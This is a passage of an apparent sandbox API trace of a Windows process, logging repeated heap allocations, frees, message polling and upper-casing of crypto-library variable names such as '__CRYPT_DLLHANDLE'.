RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0153.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0153.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0153.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0153.635] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0153.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0153.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.636] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0153.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0153.637] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0153.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0153.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0153.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0153.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0153.638] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0153.638] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0153.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0153.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0153.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0153.639] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0153.639] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0153.639] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0153.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0153.639] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0153.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0153.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.640] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0153.640] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0153.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0153.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0153.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0153.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0153.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0153.641] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0153.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0153.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0153.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0153.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0153.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0153.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0153.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0153.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14106) returned 0x2e94440 [0153.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94440 | out: hHeap=0x970000) returned 1 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0153.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 